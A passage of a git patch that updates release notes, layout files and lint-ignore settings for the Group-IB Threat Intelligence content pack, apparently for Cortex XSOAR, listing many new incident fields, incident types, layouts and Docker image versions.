Cybercriminals Threat Actor Description** +- New: **GIB Organization BIC** +- New: **GIB Target City** +- New: **GIB DDOS Target City** +- New: **GIB Malware Short Description** +- New: **GIB Provider Domain** +- New: **GIB Nation-State Cybercriminal Forums Table** +- New: **GIB Scanner Categories** +- **GIB Phishing Kit Emails** +- **GIB Leak Name** +- New: **GIB Country Code** +- New: **GIB Service Domain** +- New: **GIB 
Nation-State Cybercriminals Threat Actor Goals** +- **GIB Drop Email Domain** +- New: **GIB Date Last Seen** +- New: **GIB Deface Site URL** +- New: **GIB CNC URL** +- **GIB Reliability** +- New: **GIB DDOS Request Headers Body** +- New: **GIB Date Last Compromised** +- New: **GIB Merged Cvss** +- **GIB Leaked Data** +- **GIB Password** +- New: **GIB DDOS Target IP** +- New: **GIB Phishing Kit Email** +- New: **GIB Malware File hash** +- **GIB Data Hash** +- New: **GIB Organization BSB** +- New: **GIB Downloaded From Table** +- New: **GIB Phishing Date Detected** +- New: **GIB Organization Name** +- New: **GIB Nation-State Cybercriminals Threat Countries** +- **GIB Threat Actor ID** +- New: **GIB Bulletin Family** +- **GIB Address** +- New: **GIB DDOS Target Provider** +- New: **GIB Nation-State Cybercriminals Threat Actor Reports Table** +- **GIB Compromised Login** +- New: **GIB Phishing Kit Table** +- **GIB Phishing Status** +- New: **GIB Date First Compromised** +- New: **GIB Extended Description** +- **GIB Title** +- New: **GIB DDOS Type** +- **GIB HTML** +- New: **GIB DDOS Target Country Name** +- New: **GIB Parsed Login IP** +- **GIB Victim IP** +- New: **GIB Malware Categories** +- New: **GIB Date Updated At** #### Incident Types -- Added new incident types for new and old collections and also changed old incident types related to old collections - -##### New: GIB Nation-State Cybercriminals Threat Actor - -##### New: GIB Suspicious IP Scanner - -##### New: GIB Suspicious IP Socks Proxy - -##### New: GIB Compromised Card Group - -##### New: GIB Suspicious IP TOR Node - -##### New: GIB Attacks DDOS - -##### New: GIB Attacks Phishing Kit - -##### New: GIB Compromised Account Group - -##### GIB Compromised Card - -##### New: GIB OSI Vulnerability - -##### GIB OSI Public Leak - -##### New: GIB Nation-State Cybercriminals Threat - -##### GIB Brand Protection Phishing - -##### GIB Targeted Malware - -##### New: GIB Malware CNC - -##### New: GIB Cybercriminal 
Threat - -##### GIB Compromised Account - -##### New: GIB Malware - -##### GIB OSI Git Leak - -##### New: GIB Suspicious IP Open Proxy - -##### New: GIB Cybercriminal Threat Actor - -##### New: GIB Suspicious IP VPN - -##### New: GIB APT Threat - -##### New: GIB Compromised Mule - -##### GIB Data Breach - -##### GIB Brand Protection Phishing Kit - -##### New: GIB Attacks Deface - -##### New: GIB Attacks Phishing Group - +- New: **GIB Attacks DDOS** +- New: **GIB Compromised Account Group** +- New: **GIB Attacks Deface** +- **GIB OSI Git Leak** +- **GIB Compromised Account** +- **GIB Brand Protection Phishing Kit** +- **GIB Brand Protection Phishing** +- New: **GIB Nation-State Cybercriminals Threat Actor** +- New: **GIB Malware** +- New: **GIB Suspicious IP Open Proxy** +- **GIB Targeted Malware** +- New: **GIB Attacks Phishing Kit** +- New: **GIB Cybercriminal Threat** +- New: **GIB Suspicious IP Socks Proxy** +- New: **GIB Cybercriminal Threat Actor** +- New: **GIB APT Threat** +- New: **GIB Nation-State Cybercriminals Threat** +- New: **GIB Suspicious IP Scanner** +- New: **GIB Suspicious IP VPN** +- New: **GIB Suspicious IP TOR Node** +- New: **GIB Attacks Phishing Group** +- New: **GIB Compromised Card Group** +- **GIB Compromised Card** +- New: **GIB OSI Vulnerability** +- **GIB OSI Public Leak** +- **GIB Data Breach** +- New: **GIB Compromised Mule** +- New: **GIB Malware CNC** #### Indicator Fields -- Added new indicator fields for new and old collections and also changed old indicator fields related to old collections - -##### GIB Malware Name - -##### GIB Severity - -##### GIB Reliability - -##### GIB Threat Actor is APT - -##### GIB Admiralty Code - -##### GIB Credibility - -##### New: GIB Hash - -##### GIB ID - -##### GIB Threat Actor Name - -##### GIB Threat Actor ID - -##### GIB Collection - +- **GIB ID** +- **GIB Threat Actor Name** +- **GIB Malware Name** +- **GIB Reliability** +- **GIB Collection** +- **GIB Threat Actor ID** +- **GIB Severity** +- 
**GIB Threat Actor is APT** +- **GIB Proxy Anonymous** +- New: **GIB Hash** +- **GIB Credibility** +- **GIB Admiralty Code** + +#### Indicator Types + +- **GIB Victim IP** +- **GIB Compromised IMEI** +- **GIB Compromised Mule** #### Integrations ##### Group-IB Threat Intelligence -- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. - Completely updated the code, the main work with API is rewritten to use the library - +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*. ##### Group-IB Threat Intelligence Feed -- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. - Completely updated the code, the main work with API is rewritten to use the library +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*. #### Layouts +##### GIB OSI Public Leak Layout + - New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Attacks Phishing Group Layout +##### New: GIB Suspicious IP Open Proxy Layout -##### GIB Compromised Card Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Brand Protection Phishing Kit Layout -##### New: GIB Compromised Account Group Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### GIB Victim IP Layout -##### GIB Targeted Malware Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks Phishing Group Layout -##### New: GIB Suspicious IP Scanner Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Layout -##### GIB Compromised Account Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). 
+##### GIB Compromised Mule Layout -##### New: GIB Attacks Deface Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### GIB Compromised Account Layout -##### New: GIB Cybercriminal Threat Actor Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks DDOS Layout -##### New: GIB Suspicious IP Open Proxy Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Targeted Malware Layout -##### New: GIB Malware CNC Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks Phishing Kit Layout -##### GIB OSI Public Leak Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Socks Proxy Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). ##### New: GIB Compromised Card Group Layout -##### New: GIB Nation-State Cybercriminals Threat Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Actor Layout -##### New: GIB OSI Vulnerability Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Account Group Layout -##### New: GIB Attacks Phishing Kit Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). 
+##### GIB Data Breach Layout -##### GIB Victim IP Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### GIB OSI Git Leak Layout -##### GIB Data Breach Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Malware CNC Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). ##### New: GIB Cybercriminal Threat Layout -##### GIB Brand Protection Phishing Kit Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Compromised Card Layout -##### New: GIB APT Threat Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks Deface Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). ##### New: GIB Nation-State Cybercriminals Threat Actor Layout -##### New: GIB Attacks DDOS Layout - -##### GIB Brand Protection Phishing Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Layout -##### New: GIB Suspicious IP Socks Proxy Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB OSI Vulnerability Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). 
##### GIB Compromised IMEI Layout -##### GIB Compromised Mule Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Suspicious IP VPN Layout -##### GIB OSI Git Leak Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Brand Protection Phishing Layout -##### New: GIB Malware Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Suspicious IP TOR Node Layout -##### New: GIB Suspicious IP VPN Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB APT Threat Layout -##### New: GIB Suspicious IP TOR Node Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Scanner Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). #### Mappers ##### Group-IB Threat Intelligence (mapper) -- Added under new collections and edited under old collections +- Added and modified to support new collections + +#### Playbooks + +##### Incident Postprocessing - Group-IB Threat Intelligence & Attribution + +- Added and modified post-processing for new collections + +#### Scripts + +##### GIBIncidentUpdate -#### PreProcess Rules +- Added and modified to support new collections +- Updated the Docker image to: *demisto/python3:3.12.8.1983910*. +##### GIBIncidentUpdateIncludingClosed -##### New: gib_test +- Added and modified to support new collections +- Updated the Docker image to: *demisto/python3:3.12.8.1983910*. From 92e79eb12fd40a66df31a3b211e1ac32529cfea7 Mon Sep 17 00:00:00 2001 
From: Amichai Date: Thu, 30 Jan 2025 12:51:43 +0200 Subject: [PATCH 5/9] New RN format --- .../.pack-ignore | 2 +- ...container-GIB_Compromised_Mule_Layout.json | 2 +- ...outscontainer-GIB_OSI_Git_Leak_Layout.json | 2 +- ...scontainer-GIB_OSI_Public_Leak_Layout.json | 2 +- .../ReleaseNotes/2_0_0.md | 1589 +++++++++++++---- 5 files changed, 1268 insertions(+), 329 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 43743e9609fe..84d337d0295e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -218,7 +218,7 @@ ignore=IF115 ignore=IF115 [file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json] -ignore=IF115 +ignore=IF115,BA116 [file:incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json] ignore=IF115 diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json index d7190a4a63c1..9fe4dd777300 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json @@ -5,7 +5,7 @@ "name": "GIB Compromised Mule Layout", "system": false, "version": -1, - "fromVersion": "0.0.0", + "fromVersion": "6.0.0", "detailsV2": { "tabs": [ { diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json index eba2068f5639..22634bbdf900 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json 
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json @@ -483,5 +483,5 @@ "name": "GIB OSI Git Leak Layout", "system": false, "version": -1, - "fromVersion": "0.0.0" + "fromVersion": "6.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json index 6536df8300de..b58209c5720b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json @@ -478,5 +478,5 @@ "name": "GIB OSI Public Leak Layout", "system": false, "version": -1, - "fromVersion": "0.0.0" + "fromVersion": "6.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index dfe89d9f6364..c8226c264d61 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md 
@@ -3,401 +3,1340 @@ ##### Group-IB Threat Intelligence (classifier) -- Added and modified classifications for new collections +- Updated the Group-IB Threat Intelligence (classifier) classifier to support new collections. #### Incident Fields -- New: **GIB Target ASN** -- **GIB Related Indicators Data** -- **GIB Inject Dump** -- New: **GIB Organization SWIFT** -- New: **GIB Update Time** -- **GIB Name Servers** -- **GIB Portal Link** -- **GIB Source** -- New: **GIB DDOS Target URL** -- New: **GIB Proxy Source** -- New: **GIB Reporter** -- New: **GIB CNC Domain** -- New: **GIB Phishing Brand** -- **GIB Card Valid Thru** -- New: **GIB Compromised Account** -- **GIB Payment System** -- New: **GIB Phishing Date Added** -- New: **GIB Report Number** -- New: **GIB Email Domains** -- New: **GIB Nation-State Cybercriminals Sectors** -- New: **GIB Malware Langs** -- New: **GIB Target IP** -- New: **GIB Date Modified** -- New: **GIB GIT Source** -- New: **GIB Deface Date** -- New: **GIB Cybercriminal Regions** -- New: **GIB DDOS Request Body Hash** -- New: **GIB CNC** -- New: **GIB DDOS Request Body** -- New: **GIB Nation-State Cybercriminals Threat Actor CVE** -- **GIB Date of Detection** -- **GIB Phishing Date Blocked** -- New: **GIB Phishing Registrar** -- New: **GIB DDOS Request Data Link** -- New: **GIB Nation-State Cybercriminals Regions** -- New: **GIB Cybercriminal Expertises** -- New: **GIB Malware Aliases** -- **GIB Phishing Kit Hash** -- **GIB Admiralty Code** -- New: **GIB Phishing Kit Source** -- New: **GIB Threat Actor Country** -- New: **GIB Date Add** -- New: **GIB DDOS Protocol** -- **GIB Downloaded From** -- New: **GIB Malware Source Countries** -- New: **GIB DDOS Date Registration** -- New: **GIB DDOS Target Port** -- New: **GIB CPE Table** -- New: **GIB Organization CLABE** -- **GIB Threat Actor Name** -- New: **GIB Is Tailored** -- New: **GIB Phishing Objectives** -- New: **GIB Has Exploit** -- New: **GIB OSI Git Repository Files Table** -- New: **GIB 
Cybercriminal Sectors** -- New: **GIB Phishing Domain Puny** -- **GIB Phishing Domain** -- New: **GIB Socks Proxy Source** -- New: **GIB Nation-State Cybercriminals Threat Description** -- **GIB Screenshot** -- New: **GIB Threat Level** -- New: **GIB Link List Table** -- New: **GIB Nation-State Cybercriminals Threat Title** -- New: **GIB Proxy Type** -- New: **GIB Vulnerability Type** -- New: **GIB Cybercriminal Threat Actor Reports Table** -- New: **GIB Affected Software Table** -- New: **GIB VPN Sources** -- New: **GIB Parsed Login Domain** -- New: **GIB Nation-State Cybercriminals Threat Actor Roles** -- New: **GIB Organization IBAN** -- New: **GIB DDOS Target Domain** -- New: **GIB Cybercriminal Malware** -- New: **GIB Compromised Events Information Table** -- New: **GIB Mirror Link** -- New: **CPE Table** -- New: **GIB Cybercriminal Forums Table** -- New: **GIB Nation-State Cybercriminals Threat Actor Country** -- New: **GIB Cybercriminal Threat Actor Report Authors** -- New: **GIB Cybercriminal Threat Actor Aliases** -- New: **GIB Cybercriminal Threat Description** -- New: **GIB Malware Regions** -- New: **GIB Cybercriminal Threat Actor Description** -- New: **GIB CNC Port** -- New: **GIB Target Provider** -- **GIB Card Number** -- New: **GIB Phishing IP Table** -- New: **GIB Cybercriminal Threat Title** -- **GIB Inject MD5** -- **GIB Malware Name** -- New: **GIB Nation-State Cybercriminals Threat Expertises** -- New: **GIB DDOS Target ASN** -- New: **GIB Malware Description** -- **GIB Card Issuer** -- New: **GIB DDOS Request Headers Hash** -- **GIB Drop Email** -- New: **GIB Phishing URLs** -- **GIB Credibility** -- New: **GIB Target Domain Provider** -- New: **GIB Extended CVSS Overall** -- New: **GIB DDOS Date Begin** -- **GIB Person** -- New: **GIB DDOS Source** -- New: **GIB Extended CVSS Exploitability** -- New: **GIB Malware CNC Domain** -- **GIB Date Created** -- New: **GIB DDOS Target Category** -- New: **GIB Date Published** -- New: **GIB Phishing 
Sources** -- New: **GIB Href** -- New: **GIB Nation-State Cybercriminals Expertises** -- **GIB Card Type** -- New: **GIB Proxy Port** -- New: **GIB Date First Seen** -- New: **GIB DDOS Target Region** -- New: **GIB Extended CVSS Impact** -- New: **GIB CVSS Score** -- **GIB Date Compromised** -- **GIB Severity** -- **GIB Date Expired** -- New: **GIB Proxy Sources** -- New: **GIB Passwords** -- New: **GIB Compromised Events Table** -- **GIB Target Brand** -- New: **GIB Emails** -- **GIB Repository** -- New: **GIB Date Created At** -- New: **GIB DDOS Target Country Code** -- New: **GIB Service IP** -- New: **GIB Country Name** -- New: **GIB Nation-State Cybercriminals Threat Report Number** -- New: **GIB Nation-State Cybercriminals Threat Sectors** -- New: **GIB DDOS Duration** -- New: **GIB Leak Published** -- New: **GIB DDOS Date End** -- New: **GIB Deface Source** -- **GIB Target Domain** -- New: **GIB Nation-State Cybercriminals Threat Actor Labels** -- **GIB ID** -- **GIB Target Category** -- New: **GIB Extended CVSS Base** -- New: **GIB VPN Names** -- **GIB Leaked File Name** -- New: **GIB Upload Time** -- **GIB Email** -- New: **GIB Nation-State Cybercriminals Malware** -- New: **GIB Target Region** -- **GIB Phishing Type** -- **GIB CVV** -- New: **GIB CVSS Vector** -- New: **GIB Matches Table** -- New: **GIB Deface Contacts** -- New: **GIB Malware Platforms** -- New: **GIB Phishing Domain Expiration Date** -- New: **GIB Service URL** -- **GIB Favicon** -- New: **GIB Date Incident** -- New: **GIB Nation-State Cybercriminals Threat Regions** -- New: **GIB Nation-State Cybercriminals Threat Langs** -- New: **GIB Threat Actors Table** -- New: **GIB Malware Table** -- **GIB Threat Actor is APT** -- New: **GIB Extended CVSS Temporal** -- New: **GIB Phishing Kit Path** -- New: **GIB Nation-State Cybercriminals Threat Actor Description** -- New: **GIB Organization BIC** -- New: **GIB Target City** -- New: **GIB DDOS Target City** -- New: **GIB Malware Short 
Description** -- New: **GIB Provider Domain** -- New: **GIB Nation-State Cybercriminal Forums Table** -- New: **GIB Scanner Categories** -- **GIB Phishing Kit Emails** -- **GIB Leak Name** -- New: **GIB Country Code** -- New: **GIB Service Domain** -- New: **GIB Nation-State Cybercriminals Threat Actor Goals** -- **GIB Drop Email Domain** -- New: **GIB Date Last Seen** -- New: **GIB Deface Site URL** -- New: **GIB CNC URL** -- **GIB Reliability** -- New: **GIB DDOS Request Headers Body** -- New: **GIB Date Last Compromised** -- New: **GIB Merged Cvss** -- **GIB Leaked Data** -- **GIB Password** -- New: **GIB DDOS Target IP** -- New: **GIB Phishing Kit Email** -- New: **GIB Malware File hash** -- **GIB Data Hash** -- New: **GIB Organization BSB** -- New: **GIB Downloaded From Table** -- New: **GIB Phishing Date Detected** -- New: **GIB Organization Name** -- New: **GIB Nation-State Cybercriminals Threat Countries** -- **GIB Threat Actor ID** -- New: **GIB Bulletin Family** -- **GIB Address** -- New: **GIB DDOS Target Provider** -- New: **GIB Nation-State Cybercriminals Threat Actor Reports Table** -- **GIB Compromised Login** -- New: **GIB Phishing Kit Table** -- **GIB Phishing Status** -- New: **GIB Date First Compromised** -- New: **GIB Extended Description** -- **GIB Title** -- New: **GIB DDOS Type** -- **GIB HTML** -- New: **GIB DDOS Target Country Name** -- New: **GIB Parsed Login IP** -- **GIB Victim IP** -- New: **GIB Malware Categories** -- New: **GIB Date Updated At** +##### New: GIB Cybercriminal Forums Table + +- New: Added a new incident field- GIB Cybercriminal Forums Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CVSS Score + +- New: Added a new incident field- GIB CVSS Score that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB Country Code + +- New: Added a new incident field- GIB Country Code that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Actor Report Authors + +- New: Added a new incident field- GIB Cybercriminal Threat Actor Report Authors that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Last Seen + +- New: Added a new incident field- GIB Date Last Seen that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Target Brand + +- Updated the GIB Target Brand incident field to support new collections. +##### New: GIB CVSS Vector + +- New: Added a new incident field- GIB CVSS Vector that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Is Tailored + +- New: Added a new incident field- GIB Is Tailored that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Platforms + +- New: Added a new incident field- GIB Malware Platforms that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Expertises + +- New: Added a new incident field- GIB Nation-State Cybercriminals Expertises that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Email Domains + +- New: Added a new incident field- GIB Email Domains that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB DDOS Target Country Name + +- New: Added a new incident field- GIB DDOS Target Country Name that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Inject Dump + +- Updated the GIB Inject Dump incident field to support new collections. +##### New: GIB Organization Name + +- New: Added a new incident field- GIB Organization Name that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Proxy Port + +- New: Added a new incident field- GIB Proxy Port that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Port + +- New: Added a new incident field- GIB DDOS Target Port that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Phishing Kit Hash + +- Updated the GIB Phishing Kit Hash incident field to support new collections. +##### GIB Malware Name + +- Updated the GIB Malware Name incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Langs + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Langs that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Kit Email + +- New: Added a new incident field- GIB Phishing Kit Email that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Domain + +- New: Added a new incident field- GIB DDOS Target Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB Nation-State Cybercriminals Threat Regions + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Regions that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Target Provider + +- New: Added a new incident field- GIB Target Provider that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Source Countries + +- New: Added a new incident field- GIB Malware Source Countries that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Published + +- New: Added a new incident field- GIB Date Published that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Country Code + +- New: Added a new incident field- GIB DDOS Target Country Code that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Drop Email Domain + +- Updated the GIB Drop Email Domain incident field to support new collections. +##### New: GIB Date First Compromised + +- New: Added a new incident field- GIB Date First Compromised that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Payment System + +- Updated the GIB Payment System incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Actor Roles + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Roles that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB Phishing Kit Path + +- New: Added a new incident field- GIB Phishing Kit Path that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Table + +- New: Added a new incident field- GIB Malware Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Sources + +- New: Added a new incident field- GIB Phishing Sources that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Request Headers Body + +- New: Added a new incident field- GIB DDOS Request Headers Body that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminal Forums Table + +- New: Added a new incident field- GIB Nation-State Cybercriminal Forums Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Countries + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Countries that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB OSI Git Repository Files Table + +- New: Added a new incident field- GIB OSI Git Repository Files Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Emails + +- New: Added a new incident field- GIB Emails that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB DDOS Target City + +- New: Added a new incident field- GIB DDOS Target City that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Drop Email + +- Updated the GIB Drop Email incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Actor CVE + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor CVE that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Deface Contacts + +- New: Added a new incident field- GIB Deface Contacts that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Organization IBAN + +- New: Added a new incident field- GIB Organization IBAN that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Events Table + +- New: Added a new incident field- GIB Compromised Events Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Repository + +- Updated the GIB Repository incident field to support new collections. +##### New: GIB Deface Source + +- New: Added a new incident field- GIB Deface Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Organization BSB + +- New: Added a new incident field- GIB Organization BSB that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Description + +- New: Added a new incident field- GIB Cybercriminal Threat Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). 
